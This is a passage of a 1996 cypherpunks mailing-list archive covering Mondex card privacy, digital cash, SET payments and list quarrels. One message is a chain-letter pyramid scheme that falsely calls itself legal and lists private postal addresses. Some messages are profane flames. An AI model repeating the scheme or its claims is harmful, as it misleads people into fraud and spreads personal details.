over the information.  Where's the similar "privacy" for cash
transactions?

As far as the card is concerned, we need it to enter all of our student
facilities.  Without the card, you can't play sports in the sports hall,
or get into many Univerity social events.  I think we will even be able
to use the card to electronically vote.  (The implications of this are
obvious - will the hierarchy know your poitical standing in
elections???)

It's funny, I never realised how much information they have on me, until
I've just sat down and thought about it.

If you want any more details, just send us an Email.


	Rob.



 

_____________________________________________________________________

    cs94rjb@dcs.ex.ac.uk        Rob Blakemore, Exeter University.
_____________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Mon, 28 Oct 1996 10:27:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Australia's Advance Bank Promises Christmas Ecash 10/25/96
Message-ID: <2.2.32.19961028183135.00969ea0@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Mon, 28 Oct 1996 13:20:02 -0500
>From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
>To: reagle@rpcp.mit.edu
>Subject:  Australia's Advance Bank Promises Christmas Ecash 10/25/96
>
>
>  	  				 
>SYDNEY, AUSTRALIA 1996 OCT 25 (NB) -- By Stuart Kennedy, Computer Daily  
>News. Come Christmas, electronic cash should begin jingling around the 
>Australian side of the global Internet. The Sydney-based Advance Bank 
>has signed on for Netherlands-based DigiCash's "Ecash" system and 
>expects to be issuing Australian denominated Ecash by the end of the 
>year. 
>
>The deal puts Advance a further step ahead of its Australian rivals in  
>the Internet-based banking transaction game. Most other Australian banks 
>are still dabbling with information-only Web pages while Advance has 
>been offering its customers Internet-transacted account information, 
>account transfers, bill payments and now Ecash. 
>
>It also makes Advance the first bank in the Asia Pacific region to  
>employ an Internet-based digital money system and Australian currency 
>the fourth in the world to get the digital treatment, DigiCash claims. 
>
>Other DigiCash licensees are Mark Twain Bank (US), Deutsche Bank  
>(Germany), Merita Bank (Finland) and Posten (Sweden). 
>
>"We would like to see more than one Australian bank take up the system.  
>We have been talking to other (Australian) banks, " says DigiCash 
>Australia's managing director, Andreas Furche, who has also had chats 
>with the Australian Reserve Bank over the implications of Ecash for the 
>Australian economy. 
>
>The big task for Advance (and affiliate BankSA) is convincing merchants  
>to sign up for the new electronic cash system which could catalyze an 
>Australian online economy. 
>
>This week Advance's Web pages were already featuring electronic sign-up  
>forms for merchants. The bank has yet to finalize transaction charges 
>for the system, but costs should be lower than the credit card 
>transactions currently used for most Net-based retail commerce. 
>
>Digicash established its Australian operation in March. The corporation  
>claims the Ecash system provides transactions that are as secure and 
>secret as interbank transactions. A user draws money from an account 
>and stores it in software as "Ecash." When a purchase is agreed, Ecash 
>transfers electronic "coins" from the PC, sealed into an electronic 
>"envelope" which goes to the nominated bank for authentication. 
>
>The bank cannot see the details of the transaction. Once authenticated,  
>the payment goes to the payee, who receives a credit. 
>
>(19961025)   	
>  	   	
>
>
_______________________
Regards,          What we hope ever to do with ease, we must learn first to do 
                  with diligence. -Samuel Johnson
reagle@mit.edu    E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Main Contact <isptv@access.digex.net>
Date: Mon, 28 Oct 1996 11:05:48 -0800 (PST)
Subject: Jonatahan Wallace on ISP-TV Monday Night
Message-ID: <199610281905.OAA11956@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


*** ISP-TV Program Announcement: Jonathan Wallace Interview ***

*** Monday, Oct. 28 ***
*** 9:00 PM ET      ***

Jonathan Wallace will be the guest on this week's "Real Time"  interview
series.  Wallace is co-author of the book "Sex, Laws, and Cyberspace",
which describes the genesis of the Communications Decency Act.  Wallace is
also editor of the Ethical Spectacle, a web newsletter discussing ethics,
law, politics, and their intersection.

This video interview can be viewed on the ISP-TV main CU-SeeMe reflector
at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at
http://www.digex.net/isptv/members.html

See URL http://www.digex.net/isptv for more information about the ISP-TV
Network

To obtain Enhanced CU-SeeMe software, go to:

	http://goliath.wpine.com/cudownload.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 28 Oct 1996 11:27:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lawyers, companies to create Internet legal group
Message-ID: <01IB6J076MV4A737P7@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


>   ______________________________________________________________________
>                        Schoolhouse Videos and CD's
>   ______________________________________________________________________
>     21 companies offer financial support for Internet legal policy group
>  __________________________________________________________________________
>      Copyright (c) 1996 Nando.net
>      Copyright (c) 1996 Scripps-McClatchy Western
      
>   TACOMA, Wash (Oct 2, 1996 00:18 a.m. EDT) -- A year ago, a group of
>   lawyers gathered in Seattle to launch an organization they hoped would
>   help set legal policies for the Internet.
   
>   On Tuesday, that group announced the formal financial support of 21
>   international companies -- from Microsoft to Netscape, from British
>   Telecom to Bell Canada. These companies and the researchers employed
>   by the newly named "Internet Law & Policy Forum," hope to set Internet
>   guidelines for governments and industry on such issues as copyright,
>   content and commerce.
   
[...]

>   This group hopes to help answer those questions and others by
>   researching and pooling policies from governments, companies and legal
>   experts. Then researchers will propose guidelines for others to
>   follow. If companies with such competing interests as AT&T and MCI,
>   and Mastercard and Visa can agree on Internet guidelines, Gidari's
>   group hopes governments will let industry regulate itself, he said
>   Tuesday.
   
>   "It should make government less interested in addressing an issue by a
>   law when they can see people are acting responsibly without it," he
>   said. "It diffuses the need to do something. It's a lot harder to
>   legislate when the problem is being addressed."

	An apparantly good motive... although that self-censorship is no
better than normal censorship is something to consider.
   
[...]

>   Corporate sponsors are America Online, AT&T, Americatel Corp., Bell
>   Canada, BBN Corp., British Telecom, CiscoSystems Inc., Deutsche
>   Telekom, General Electric Information Services, General Magic, Hong
>   Kong Telecom, IBM, Mastercard International, MCI Communications Corp.,
>   Microsoft, Netscape, Omnes -- a Schlumberger//Cable & Wireless Co.,
>   Oracle Corp., Premenos Technology Corp., Telus Corp. and Visa
>   International.
   
>   During the last year, working groups focused on two areas. They looked
>   at how to certify signatures and information used in electronic
>   commerce and what to do about unacceptable materials on the Internet.
>   The results will be presented at a conference the London conference.
   
>   The group will be led by Jeffrey Ritter, a United Nations expert who
>   now works for ECLIPS, a research program on the laws and policies of
>   electronic commerce located at the Ohio Supercomputer Center. He
>   helped found the forum with Gidari and Peter Harter, public policy
>   counsel for Netscape.

	Anybody at Netscape know much about this third guy? The United
Nations connection of the first one doesn't seem encouraging... the UN is
heavy on national sovreignty and lacking in civil liberties, especially
economic ones.
   
>   "Without an established framework, the Internet faces a confusing and
>   potentially disabling range of national laws seeking to govern a
>   global environment," Ritter said. "The Internet Law & Policy Forum
>   offers the potential for a neutral venue in which the collaborative
>   resources of those parties that are helping to drive the Internet
>   forward can be focused to achieve genuine progress in resolving legal
>   and policy issues."
   
>    Copyright (c) 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 28 Oct 1996 12:57:57 -0800 (PST)
To: cypher@cyberstation.net
Subject: Re: Q.E.D   P+P == talk the talk - but - P+P != walk the walk
In-Reply-To: <Pine.BSI.3.95.961027220837.11706A-100000@citrine.cyberstation.net>
Message-ID: <199610282054.PAA10298@homeport.org>
MIME-Version: 1.0
Content-Type: text


cypher@cyberstation.net wrote:

| I withdrew the OTP claim and posted the ENTIRE algorithm, in a posting
|  
|            dated 10-24-96
|            addressed to Adam Shostack,
|                     and titled
| Montgolfiering P Information= P log_base_infinity P, 

I never saw this post.  I speak up only becauase quite a few people
have sent me mail asking for it, and I've never seen it.

| Since, then they they have suddenly grown silent. Nary a peep out of the
| previously oh so vocal. It is obvious that they are totally clueless about
| how to go about breaking the  algorithm, or they would have jumped at the
| opportunity to add a notch to their analytical gun.  As becomes quickly
| apparent, the algorithm cannot be broken except by brute force, which is
| patently impossible.

	Perhaps you'd care to share the mail that you sent me with the
list?  I refer to a message with Message-ID
Pine.BSI.3.95.961023194449.4317A-100000@citrine.cyberstation.net

Adam


-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 28 Oct 1996 13:10:49 -0800 (PST)
To: John Young <cypherpunks@toad.com
Subject: Re: FDA_dis
Message-ID: <3.0b19.32.19961028160958.007172f4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:25 AM 10/28/96 -0500, John Young wrote:
>10-28-96. WaPo:
>
>Dissing Declan's Hotwired slam of the FDA conference on 
>regulating Internet advertising and promotion: "Ultimately, 
>this debate isn't about speech. It comes down to how much 
>regulation we want."
>
>Declan, singe dis negro inquisto, si?

I *loved* this from the Washington Post reporter who showed that he is a
little light on his understanding of the First Amendment too.

"As it has been interpreted by the courts for years, the
 First Amendment doesn't protect lies, and it doesn't
 protect obscenity, and it doesn't prohibit government from
 regulating what's known as 'commercial speech.'"

It does protect most lies.  It does protect some obscenity.  It does
protect quite a lot of commercial speech.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kwit@iap.net.au
Date: Mon, 28 Oct 1996 02:05:08 -0800 (PST)
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: (no subject)
In-Reply-To: <Pine.BSF.3.91.961027225845.11353A-100000@mcfeely.bsfs.org>
Message-ID: <327564F1.4EA8@iap.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Rabid Wombat wrote:
> 
> God, I love Juno.
> 
> On Sun, 27 Oct 1996, Leon W Samson wrote:
> 
> > hahahahahahahahaha learn to teach!!!!!hahahahahahahahah
> >




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lazaris <lazaris1@concentric.net>
Date: Wed, 30 Oct 1996 22:04:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: $ NEED CASH?
Message-ID: <3275496F.3048@concentric.net>
MIME-Version: 1.0
Content-Type: text/plain


TAKE ONLY 2 MIN. TO READ THIS AND YOU'LL TURN $5 INTO $50,000 IN ONLY 1
MONTH!!
========================================================================
--->> NO CATCH <<-------------------------------------------------------
1) 100% legal and legitimate.
2) 
Nobody gets scammed.
3) Everybody wins.

--->> THE SIMPLE 5 MIN. PROCESS <<--------------------------------------
1) Write your name & address on five (5) pieces of paper.
2) Below that, write the phrase, "please add me to your mailing list".
3) Fold a $1.00 bill inside each piece of paper & mail them to the   
following 5 addresses:
             
             1. David Watkins
                409 N.E. 107 St.
                Miami Florida, USA 333161

             2. David Phillips
                321 Felder AV.
                Montgomery, AL. 36104
              
             3. Robert Haar
                1628 Hillcrest St.
                Mesquite, Tx. 75149

             4. K. Keoki Pelfrey
                PO Box 384971
                Waikoloa, HI. 96738-4971

             5. HI-TECH
                6910 W. Brown Deer Rd.Suite 251
                Milwaukee, WI. 53223-2104

4)Remove top name from list & move other names up one, placing your name
&address @ #5 of the list.

5)Post article on at least 200 newsgroups. (Remember there are 1000's 
more groups==more $$

6)Returns should come in 7-10 days and all you have to do is keep the $
for yourself and put the persons name on a list w/ the rest of the
respondies addresses (makes it legal).

--->>HOW THE SYSTEM WORKS<<---------------------------------------------
     $55,555.00 in one mo.

1)Your 200 newsgroups posting==average 5 responses==$5 CASH with your
name @ #5

2)Each person who sent you $1.00 makes 200 More postings==avg. 50
responses= $50 CASH with your name @ #4

3)These 50 people make 200 More postings==10,000 postings with your name
@ #3==avg. 500 responses==$500 CASH

4)They then make 200 More postings==100,000 postings with your name @
#2==5000 returns @ $1.00 each==$5,000 CASH

5)Finally 5,000 people make 200 postings==$50,000 CASH with your name @
#1 

NOTE: All this happens with only making 200 postings each time...imagine
what it's like when people do more than that, like me.

--->>AFTER 1 MONTH<<----------------------------------------------------
1)No longer on the list. 
2)Take newest publication & start cycle all over again.

ALL IT TAKES IS $5, 5ENVELOPS, & 5 STAMPS!!!

REMEMBER HONESTY IS THE BEST POLICY
YOU DON'T NEED TO CHEAT THE BASIC IDEA IS TO MAKE THE $ GOD LUCK TO ALL
AND PLEASE PLAY FAIR AND YOU WILL WIN.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Mon, 28 Oct 1996 16:22:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: [NOISE] Interesting datum.
Message-ID: <961028.180410.1e5.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

The Prez was in Minneapolis today, so all the TV stations have to act as
though it were a big deal.  In the wrapup coverage of the non-event, a
WCCO talkinghead trotted out another non-story of a security breach at
MSP, where someone is thought to have slipped by security.  The
talkinghead gave complete and clear instructions on how to accomplish
this in the process of "reporting" the incident.

If I find it "reported" on their website, can I blame the net?
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMnVLYBvikii9febJAQHlkAP7BWeaJEkmOLJr+OT+qLPuxm1bvUwxhPRJ
UU2TkfHs+VYoFwT0jvx6tz3Flli4UZ7Pi9WcXsN4HXkVMXXVggDC5g4Ce6RqHDvI
M0REcSbKoQXOc9/dfaTvWrfoy8rIx5TjycF1tkdkECtKfJ1ntavdsVqNwelpPdqo
qa8qa0xgxX4=
=X85R
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sun, 27 Oct 1996 23:19:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Secure Internet-based Electronic Commerce: The View from Outside the US
Message-ID: <84648715026895@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


I've just made a draft copy of this paper available for comment as 
http://www.cs.auckland.ac.nz/~pgut01/paper.htm, a copy of the introduction is 
given below.  The whole thing is around 170K long (40 A4 pages when printed).
If anyone has any comments to make on it, please let me know.
 
Peter.
 
Introduction
------------
 
The creation of a global electronic commerce system will provide an extremely 
powerful magnet for hackers, criminals, disgruntled employees, and hostile 
(but also "friendly") governments intelligence agencies.  This problem is 
magnified by the nature of the Internet, which allows attackers to quickly 
disseminate technical details on performing attacks and software to exploit 
vulnerabilities.  A single skilled attacker willing to share their knowledge 
can enable hordes of dilletantes around the world to exploit a security hole 
in an operating system or application software within a matter of hours.  The 
Internet also enables an attacker to perform an attack over long distances 
with little chance of detection and even less chance of apprehension. The 
ability to carry this out more or less anonymously, at low cost, and with 
little chance of being caught, encourages attackers.
 
Because of well-publicized break-ins there has been a steadily increasing 
demand for encryption and related security measures to be included in software 
products.  Unfortunately these measures often consist either of "voodoo 
security" techniques where security is treated as a marketing checkbox only, 
or are rendered ineffective by the US governments refusal to allow 
non-americans access to the same security measures which it allows its own 
citizens. Organisations employing such (in)security systems may make 
themselves liable for damages or losses incurred when they are compromised.  
This paper covers the issues of using weak, US government-approved security as 
well as problems with flawed security measures, examines some of the measures 
necessary to provide an adequate level of security, and then suggests several 
possible solutions.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Mon, 28 Oct 1996 17:58:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: When did Mondex ever claim to be anonymous?
In-Reply-To: <3274B5A7.2781@dcs.ex.ac.uk>
Message-ID: <199610290156.UAA10899@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

R.J.Blakemore wrote:
> 
> I'm a student at Exeter University in England.[...]
> The National Westminster Bank have teamed up with the University to
> provide every student with an "Intelligent Student Card" to replace
> our old Student ID.[...]
> As far as the card is concerned, we need it to enter all of our 
> student facilities.  Without the card, you can't play sports in the 
> sports hall, or get into many Univerity social events.  I think we 
> will even be able to use the card to electronically vote.  (The 
> implications of this are obvious - will the hierarchy know your 
> poitical standing in elections???)

Unfortunately, it's not obvious enough. There is talk of doing
something similar at Stanford, though bureaucratic incompetence and a 
few expressions of concern about privacy have delayed implementation 
considerably.

Details of the uproar (and lawsuit?) would be appreciated to help 
convince the powers that be that a similar project here would be
unwise.

- -rich
 not quite speaking for the stanford civil liberties union
 not quite on cypherpunks, so please cc if you want me to read it
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMnVkPSoZzwIn1bdtAQExvQGAw2mKlb45D8u3MHHd/cr1TJk9Q1MOOhFl
OOd1rEh679ChzPIOhliCmjWgEbiX3Lhd
=Hc1C
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 28 Oct 1996 19:44:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hey! Dr. Vuilis!
In-Reply-To: <v03007801ae9aa9170c64@[207.167.93.63]>
Message-ID: <6iiJwD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> At 3:02 AM -0500 10/28/96, Dr.Dimitri Vulis KOTM wrote:
>
> >It's ironic that I get such e-mail even though I'm not even subscribed to
> >cypherpunks or coderpunks anymore. (I've been deleted from both lists several
> >times w/o asking, apparently by the list owner; I resubscribed; so now
> >majordomo@toad.com has been instructed to ignore all requests from me).
> >
> Nonsense. I haven't unsubscribed you, nor do I know anyone who has. Nor do
> I have any say over who is on the list and who is not. So far as I know,
> majordomo@toad.com has not been "instructed" to ignore your list requests.

Timmy May might be telling the truth for a change - he's so clueless
about computers that he probably has nothing to do with maintaining
majordomo and knows nothing about it.

Here's what's been happening: several times over the last two weeks I
received notices from majordomo@toad.com saying that I've been
unsubscribed from the cypherpunks mailing list. I emphasize that I've
never asked to be unsubscribed. Whenever I got such notice, I sent a
"subscribe cypherpunks" back to majordomo, and would get back a "welcome
to cypherpunks" blurb within an hour.

About last Thursday, I was forcibly removed from the mailing list again,
and majordomo stopped replying to any commands (subscribe, who, help)
sent from any address with dm.com in it. The mail doesn't bounce; it
just goes into a black hole. However, when I e-mail it "who cypherpunks"
or "who coderpunks" from an address in another domain, I get a response
(the list of subscribers) within minutes (so majordomo@toad.com is up)
and I see that I'm no longer on either list.

If the majordomo hasn't been "instructed" to ignore my attempts to
re-subscribe, then it must have done so on its own free will. :-)

And some space aliens in a flying saucer must have repeatedly
unsubscribed me against my wishes. :-) :-)

And Timmy May's credibility keeps growing by the hour. :-) :-) :-)

I've sent a couple of responses to cypherpunks@toad.com to e-mails that
were cc:'d to me. Apparently they _were distributed (I think so because
a certain Timmy May clone sends back to me a copy of everything I send
to c-p with the word "fuckhead" at the end.)

I can't say that I miss the non-stop ethnic/religious flames and
ruminations about "brute force attacks on one-time pads" much...

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 27 Oct 1996 22:31:57 -0800 (PST)
To: "gbroiles@netbox.com>
Subject: Re: considering internet/privacy periodical
Message-ID: <19961028063026703.AAA210@io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 27 Oct 1996 16:36:14 -0800, Greg Broiles wrote:


>I'm considering putting together a periodic publication about the technical
>and legal aspects of privacy and the Internet. My "business model" would
>feature free WWW/email access with a charge for fax or postal delivery. I'm
>curious to know if this strikes people as interesting or just Yet Another
>Email Newsletter Of No Real Consequence. (no offense taken if it's the
>latter.)

If you did a real noise-removal job, this could be very useful.  Sort of a
privacy-RISKs digest, if you will.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Patrick Elam, III" <patelam3@mindspring.com>
Date: Mon, 28 Oct 1996 19:53:32 -0800 (PST)
To: "R.J.Blakemore" <cs94rjb@dcs.ex.ac.uk>
Subject: Re: When did Mondex ever claim to be anonymous?
Message-ID: <1.5.4.16.19961029035526.2257b0fc@pop.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


You have claimed many flaws with the Modex system and there are even more
you have not mentioned.  I won't go into that here, except one.  When the
hardward fails how do you purchase, enter, or exercise your rights of
purchase or entry?  Privacy, there is none with a system like the Modex.  A
trial was held in Atlanta during the Olympics and it was a total disaster.
The system worked half the time.  People had money they could not spend.
But, believe me the system is coming and the world doesn't need another
avenue of access to personal data and private issues.  Bring on the
encryption and encrypt every thing.

Pat Elam
At 01:31 PM 10/28/96 +0000, you wrote:
>I'm a student at Exeter University in England.  If you are researching
>Mondex, I am sure you are aware that we are currently undergoing a
>world-wide Modex trial.
>
>The National Westminster Bank have teamed up with the University to
>provide every student with an "Intelligent Student Card" to replace our
>old Student ID.
>
>The new card has an electronic chip which can store a variety of
>information on it.  We are not sure of exactly what it holds, but it can
>store "cash" - placed onto it from specific points around campus, or any
>Nat West Cash Point machine, or even using any phone box (Yep, the bank
>have also teamed up with the phone company (BT) in order to get the
>thing working).
>
>The card can be used to pay for almost everything around campus.  Even
>in the student pubs and bars.  The Uni are offering cheaper drinks for
>those who pay by Mondex.  It is a wierd sight to watch people handing
>over their student cards to pay for a pint!
>
>I can give you as much information on the system as I can get hold of if
>you want it.
>
>As far as privacy is concerned, The claim that Modex is as private as
>cash is plainly incorrect.  Both the card chip and the card reader store
>details of the transaction.  The student can use a phone box, card
>reader or Nat West Bank Cash Machine to get details of the last ten
>transactions stored on the card.
>
>As for the Bank, they get details on the item the student has purchased,
>purchase location (the building and exact 'Mondex point' in the bar/shop
>where the transaction took place), the exact time and date the
>transaction was carried out, together with (obviously) the name and ID
>of the purchaser, etc.
>
>Should the police require the information for Criminal purposes, then (I
>am almost certain) the Bank/University would be obliged by law to hand
>over the information.  Where's the similar "privacy" for cash
>transactions?
>
>As far as the card is concerned, we need it to enter all of our student
>facilities.  Without the card, you can't play sports in the sports hall,
>or get into many Univerity social events.  I think we will even be able
>to use the card to electronically vote.  (The implications of this are
>obvious - will the hierarchy know your poitical standing in
>elections???)
>
>It's funny, I never realised how much information they have on me, until
>I've just sat down and thought about it.
>
>If you want any more details, just send us an Email.
>
>
>	Rob.
>
>
>
> 
>
>_____________________________________________________________________
>
>    cs94rjb@dcs.ex.ac.uk        Rob Blakemore, Exeter University.
>_____________________________________________________________________
>
-----BEGIN PGP SIGNED MESSAGE-----

 -------------------------------------------------------
Patrick Elam
patelam3@atl.mindspring.com    Engineering at its finest!
http://www.mindspring.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfwmggBXLW8oj+lZAQHCiwP+La/CLNY/yRvrH8TZQdvTxHK7Dgf0e1Dp
j1xsa0h4VoWXrM4v5LYHbjyFYcpJGpOY7s6yIl1vFj2HGaix6DTv222/dHleMZZp
lUJtAoJAW7AmbwA51skDc5EZZ0oSBh2BRXUfuAEzicm709SmKUKn0oH0vtKoS4Z2
xaGZ7952BX8=
=MM2Y
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp@pobox.com
Date: Tue, 29 Oct 1996 01:54:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: MASTERCARD TO TEST IBM DIGITAL WALLET;
Message-ID: <Chameleon.846565476.amp@tx86-8>
MIME-Version: 1.0
Content-Type: text/plain



Date: Mon, 28 Oct 1996 09:35:00 -0500 (EST) 

MASTERCARD TO TEST IBM DIGITAL WALLET;
Software Will Open Market to Electronic Commerce

     MasterCard International Inc. this week expects to begin testing
its digital wallet developed by IBM Corp.  and will offer some of its
customers incentives to use the product.
     The move is expected to advance widespread acceptance of
electronic commerce and increase opportunities for Internet service
providers (ISPs) and software developers looking to capitalize on
what analysts say will be a huge market.
     The digital wallet, containing a digital ID card, should be
available to the mass market in the second half to end of 1997, said
Steve Mott, senior vice president of electronic commerce/new ventures
at MasterCard.
     After the IBM test, MasterCard will work with another set of
vendors and continue testing through the first half of '97, he said.
The other vendors probably will be CyberCash Inc., Netscape
Communications Corp., VeriFone Inc., Fujitsu, and Open Market, Mott
said.
     In the first quarter of '97, testing will involve five to 10
merchants and 1,000 card holders, he said.
     The IBM digital wallet, part of IBM's CommercePOINT family of
products, is used with Netscape Navigator and incorporates the SET
(Secure Electronic Transaction) protocol.
     Mott said MasterCard wants to seed the market with the IBM
product. "They're going to be our guinea pigs," he said.
     In the next few weeks, Mott said, MasterCard will announce
agreements with U.S. banks, but declined to name them.
     Next month, MasterCard expects to release from its Web site the
SET Reference Implementation Code, which will show developers how to
build SET applications, he said. The implementation code, being
developed by Terisa Systems Inc., offers "an unambiguous application
of the code" to be used to build interoperable software, he said.
     SET will make credit card transactions more secure because it
provides confidentiality for payment information, insures integrity
for transmitted data and provides authentication.
     Ken Mohr, product marketing manager at Terisa Systems, said Visa
International Inc. and MasterCard are reviewing the first beta
version of the implementation code. The company is scheduled to
deliver the second beta version next month, he said.
     Terisa Systems hopes the second beta will be the last version
and that Visa and MasterCard will accept the implementation code in
the first quarter of '97, Mohr said.

Visa Testing in Europe

     Visa also is moving forward with efforts to implement SET. Last
week, it announced a pilot launch in Europe involving 38 Visa members
in 16 countries. A number of banks will be able to offer secure
electronic commerce within six months; full implementation of the
project will begin in the first quarter of 1998.
     "Electronic commerce will be global in nature, so it is
important we begin work on an international basis," Visa EU President
Hans van der Velde said in a prepared release.
     "SET is now robust enough to go to the single worldwide market
offered by the Internet and other networks," he said.
     Some vendors already have SET-ready products available. VeriFone
has its Internet Payment Solution that includes vPOS, vGATE and
vWallet to cover the three parts of an electronic transaction.
     Wells Fargo Bank is one of VeriFone's initial customers. The
bank is implementing vPOS and expects to launch the service to
merchants in mid-November, spokeswoman Janet Otsuki said.
     CyberCash has a Secure Internet Payment System with a CyberCash
Wallet, Secure Merchant Payment System and CyberCash Gateway Servers.
The system has been operational since April 1995.
     GTE has CyberTrust, which provides digital certificates that are
issued over the Internet to consumers with credit cards, Internet
merchants and institutions processing transactions.
     Terisa Systems is working on an as-yet-unnamed product to
implement SET into its SecureWeb Toolkit. A beta version will be
ready by year's end, Mohr said.
     Michael Goulde, an analyst with the Patricia Seybold Group,
predicted that the SET protocol will greatly lessen the perceived
risk of doing retail business over the Internet in 12 to 18 months.
     But, in a report written this month, he cautioned that there are
barriers to electronic commerce. "Consumers won't install the
software until it is seen as providing benefits, there won't be
benefits until merchants support SET, and merchants won't support SET
until consumers have the software.
     "This vicious cycle probably won't be broken unless Microsoft
provides SET-compliant software as an integral part of Windows in
1997," Goulde said.
     James Miller, a research scientist at the World Wide Web
Consortium (W3C), predicted SET won't be widely available until
Christmas '97. He said consumers will take to electronic commerce
when one or two large companies figure out that security isn't such a
huge issue for consumers and go ahead with electronic commerce.
     In the meantime, W3C and CommerceNet have completed
specifications for the Joint Electronic Payments Initiative (JEPI).
JEPI provides a universal payment platform to allow merchants and
consumers to do business over the Internet using different forms of
payment.
     The SET protocol was scheduled to be included in the first phase
of JEPI, but work on SET was not completed in time, said Daniel
Dardailler, JEPI project manager. A second phase should begin by the
end of the year, and several companies, including VeriFone, have
agreed to participate, he said.
     The second phase, which is not publicly available, will set out
to validate the Universal Payment Preamble (UPP) logic put forward in
the first phase and add more payment systems, such as SET, and
micropayments, such as CyberCoin, Ecash and Digital Millicent,
Dardailler said.
     JEPI is a standard mechanism for Web clients and servers to
negotiate payment instrument, protocol and transport between one
another. It has two parts -- Protocol Extensions Protocol (PEP), an
extension layer that sits on top of http, and UPP, which identifies
the appropriate payment methodology. More information is available at
(http://www.w3.org/pub/WWW/Payments).
     For more information, contact MasterCard at (914) 249-4606, IBM
at (914) 766-1162 or Terisa Systems at (415) 919-1776.


=30 30 30=

------------------------
Name: amp
E-mail: amp@pobox.com
Date: 10/28/96
Time: 23:03:26
Visit http://www.public-action.com/SkyWriter/WacoMuseum

EARTH FIRST! We'll strip mine the other planets later.
------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Murray Hayes" <mhayes@infomatch.com>
Date: Mon, 28 Oct 1996 22:33:22 -0800 (PST)
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Hey! Dr. Vuilis!
Message-ID: <199610290632.WAA19150@infomatch.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 27 Oct 1996 19:22:38 -0800 (PST), se7en wrote:

>
>SHUT THE FUCK UP, BITCH!!!
>

His name is Vulis.  Would you please splee it right.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 28 Oct 1996 20:38:27 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Dimacs workshop on network threats?
Message-ID: <199610290435.XAA11932@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Anyone else planning to go to the DIMACS workshop on network threats?
December 4-6 at Rutgers.
